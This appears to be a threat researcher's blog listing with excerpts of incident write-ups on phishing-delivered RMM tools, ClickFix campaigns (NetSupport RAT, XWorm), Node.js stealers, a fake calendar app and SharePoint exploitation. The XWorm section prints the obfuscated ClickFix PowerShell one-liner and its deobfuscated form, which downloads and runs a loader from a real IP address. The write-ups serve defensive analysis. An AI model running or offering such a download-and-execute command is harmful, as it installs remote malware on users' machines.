LogMeIn Unattended Installer

A user received a phishing email that redirected the to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).

The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and executes a function that reaches out to a public CloudFlare R2 bucket that hosts the malicious RMM installer.

Fisher-Price Malware

With the rise of AI, Vibe-Coded malware is now an existing threat. Sort of? In the way that a wet noodle could potentially kill you in the right circumstances, Vibe-Coded malware could also pose a threat. It’s just very unlikely. At least, with the current iterations out there.

Enter what I’m calling “Baby’s first malware” AKA “Fisher-Price Malware”. A Vibe-Coded sample found on a users’ device. It’s an “obfuscated” PowerShell loader that pulls a payload that… takes screenshots and uploads them? Kind of? Technically, it works. Sometimes. In perfect conditions.

Slides from BSides TC 2025 talk.

Direct Link

Node Malware

Node.js is commonly used to deploy stealers on devices. Often, these incidents include WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malcious Node.js scripts on the host device. Also referred to as EvilAI - TrendMicro

The linked article does a great job of breaking these down. They’re essentially .net assemblies that use WebView2 and AI-generated “web applications” (read vibe-coded html pages). These applications are bundled into an InnoSetup installer with node and a malicious script. When the installer runs, it sets up a scheduled task to execute the node script. The user only sees the intended “legitimate” AI web app get installed.

ClickFix - NetSupport RAT

Incident Overview

On Saturday, Spetember 20th, 2025, A user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occured between the previous incidents and this current campaign.

Calendaromatic and Homoglyphs

I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.

The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to electron. It combines HTML, CSS, and JavaScript into a single webview 2 based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.

ClickFix - XWorm

NOTE: Quick and dirty upload of some notes from an XWorm sample.

Technical Analysis

The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.

The ClickFix domain copied the following code to the user’s clipboard:

POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"

# Deobfuscated

FUNCTION YES { 
    &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};

$FF='HSJDUFERIKFOLDJRKMOXSDH';

$DD=$FF[8]+$FF[7]+$FF[17]; #IRM

$SS=$FF[8]+$FF[6]+$FF[19]; #IEX

# IEX (IRM 77.83.207.225/x.jpg)

The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.

WSL Shenanigans

A fun thing about WSL 2, is that it is fully capable of calling windows native functions and binaries. It also has cron. Which opens the opportunity to do some interesting things to someone’s unattended device.

Take this MSHTA execution for example. It’s a simple SAPI call made in JavaSCript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straight forward way to do this.

Side note: This malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis will reflect the 07/30 analysis date. This is also a really lazy writeup.

Intro

The initial incident was observed by Point Wild’s Threat Intelligence team Report Here.

This report covers the analysis of the sample and attack chain. Check it out, it’s a good write up. However, from the publicly available reporting at the time of original analysis, there was no information on the injection of SndVol.exe as a method for loading the REMCOS payload.

ToolShell

Jump to updates

Note: This doesn’t add much to the reference article, but covers the events as we saw them.

Reference: SharePoint Under Siege

Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to serveral detections and blocks of an encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed the first signs of activity on the affected endpoint occurred on July 17th, at 04:54:50 CDT.